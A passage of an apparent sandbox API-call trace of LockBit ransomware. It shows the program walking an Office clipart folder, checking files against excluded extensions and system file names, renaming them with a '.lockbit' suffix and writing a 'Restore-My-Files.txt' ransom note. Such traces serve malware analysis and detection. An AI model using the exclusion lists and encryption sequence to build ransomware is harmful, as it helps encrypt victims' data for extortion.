returned -1 [0161.902] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0161.902] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0161.902] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0161.902] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0161.903] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0161.903] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0161.903] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0161.903] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0161.903] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.903] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0161.903] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0161.903] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0161.903] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0161.903] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00438_.WMF") returned 1 [0161.903] lstrcmpiW (lpString1="ntldr", lpString2="NA00438_.WMF") returned 1 [0161.903] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00438_.WMF") returned 1 [0161.903] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00438_.WMF") returned -1 [0161.903] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00438_.WMF") returned -1 [0161.903] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00438_.WMF") returned 1 [0161.903] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00438_.WMF") returned -1 [0161.903] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.903] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00438_.WMF") returned=".WMF" [0161.903] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0161.903] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0161.903] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0161.903] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0161.904] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0161.904] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0161.904] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0161.904] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0161.904] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0161.904] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0161.904] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0161.904] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0161.904] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0161.904] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0161.904] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0161.904] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0161.904] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0161.904] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0161.904] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0161.904] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0161.904] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0161.904] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0161.904] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0161.904] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0161.904] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0161.904] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0161.904] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0161.904] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0161.905] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00438_.WMF.lockbit") returned 72 [0161.905] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00438_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.906] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.907] malloc (_Size=0x40068) returned 0x3df0008 [0161.907] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=12088) returned 1 [0161.907] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.907] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.907] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.908] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.908] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.913] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00438_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00438_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.913] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.913] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0161.914] free (_Block=0x1fa2ed8) [0161.914] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00438_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.914] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.914] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.914] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f311400, ftCreationTime.dwHighDateTime=0x1bd4b32, ftLastAccessTime.dwLowDateTime=0x6a34aa30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1f311400, ftLastWriteTime.dwHighDateTime=0x1bd4b32, nFileSizeHigh=0x0, nFileSizeLow=0x14bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00452_.WMF", cAlternateFileName="")) returned 1 [0161.914] lstrcmpiW (lpString1=".", lpString2="NA00452_.WMF") returned -1 [0161.914] lstrcmpiW (lpString1="..", lpString2="NA00452_.WMF") returned -1 [0161.914] PathFindExtensionW (pszPath="NA00452_.WMF") returned=".WMF" [0161.914] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0161.914] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0161.914] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0161.914] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0161.914] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0161.915] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0161.915] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0161.916] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0161.916] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0161.916] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0161.916] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0161.916] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0161.916] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0161.916] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0161.916] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0161.916] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0161.916] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0161.916] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0161.916] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.916] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0161.916] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0161.916] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0161.916] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0161.916] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00452_.WMF") returned 1 [0161.916] lstrcmpiW (lpString1="ntldr", lpString2="NA00452_.WMF") returned 1 [0161.916] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00452_.WMF") returned 1 [0161.916] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00452_.WMF") returned -1 [0161.916] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00452_.WMF") returned -1 [0161.916] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00452_.WMF") returned 1 [0161.916] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00452_.WMF") returned -1 [0161.916] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.916] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00452_.WMF") returned=".WMF" [0161.917] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0161.917] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0161.917] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0161.917] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0161.917] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0161.917] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0161.917] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0161.917] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0161.917] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0161.917] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0161.917] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0161.917] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0161.917] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0161.917] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0161.917] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0161.917] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0161.917] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0161.917] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0161.917] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0161.917] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0161.917] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0161.917] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0161.917] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0161.917] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0161.917] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0161.917] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0161.918] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0161.918] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0161.918] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00452_.WMF.lockbit") returned 72 [0161.918] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00452_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00452_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.919] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.919] malloc (_Size=0x40068) returned 0x3df0008 [0161.919] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5308) returned 1 [0161.919] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.920] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.920] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.920] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.920] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.944] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00452_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00452_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.944] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.944] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.946] free (_Block=0x1fa2ed8) [0161.946] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00452_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.946] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.946] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.946] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cceba00, ftCreationTime.dwHighDateTime=0x1bd4b32, ftLastAccessTime.dwLowDateTime=0x594ac510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1cceba00, ftLastWriteTime.dwHighDateTime=0x1bd4b32, nFileSizeHigh=0x0, nFileSizeLow=0x1580, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00454_.WMF", cAlternateFileName="")) returned 1 [0161.946] lstrcmpiW (lpString1=".", lpString2="NA00454_.WMF") returned -1 [0161.946] lstrcmpiW (lpString1="..", lpString2="NA00454_.WMF") returned -1 [0161.946] PathFindExtensionW (pszPath="NA00454_.WMF") returned=".WMF" [0161.946] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0161.946] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0161.946] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0161.946] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0161.947] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0161.947] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0161.947] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0161.947] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0161.947] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0161.947] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0161.947] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0161.947] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0161.947] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0161.947] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0161.947] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0161.947] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0161.947] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0161.947] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0161.947] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0161.947] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0161.947] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0161.947] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0161.947] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0161.947] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0161.947] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.947] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0161.947] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0161.947] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0161.947] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0161.948] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0161.948] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0161.948] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0161.948] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0161.948] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0161.948] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0161.948] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0161.948] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0161.948] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0161.948] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0161.948] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0161.948] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0161.948] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0161.948] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.948] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0161.948] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0161.948] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0161.948] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0161.948] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00454_.WMF") returned 1 [0161.948] lstrcmpiW (lpString1="ntldr", lpString2="NA00454_.WMF") returned 1 [0161.948] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00454_.WMF") returned 1 [0161.948] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00454_.WMF") returned -1 [0161.948] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00454_.WMF") returned -1 [0161.948] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00454_.WMF") returned 1 [0161.948] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00454_.WMF") returned -1 [0161.948] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.949] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00454_.WMF") returned=".WMF" [0161.949] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0161.949] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0161.949] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0161.949] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0161.949] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0161.949] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0161.949] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0161.949] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0161.949] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0161.949] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0161.949] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0161.949] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0161.949] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0161.949] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0161.949] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0161.949] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0161.949] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0161.949] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0161.949] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0161.949] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0161.949] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0161.949] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0161.949] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0161.949] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0161.949] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0161.950] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0161.950] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0161.950] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0161.950] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00454_.WMF.lockbit") returned 72 [0161.950] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00454_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00454_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.951] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.952] malloc (_Size=0x40068) returned 0x3df0008 [0161.952] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5504) returned 1 [0161.952] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.952] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.952] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.953] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.953] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.959] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00454_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00454_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.959] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.959] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0161.960] free (_Block=0x1fa2ed8) [0161.960] 